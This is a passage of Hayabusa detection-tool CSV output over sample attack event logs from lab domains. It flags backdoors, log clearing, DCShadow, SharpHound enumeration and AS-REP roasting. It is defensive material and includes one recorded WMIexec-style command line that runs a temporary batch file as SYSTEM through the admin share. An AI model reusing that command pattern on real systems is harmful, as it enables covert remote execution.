+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 
+09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this 
computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor 
Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process 
execution.evtx +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: 
null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : 
File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network 
Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 
0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 
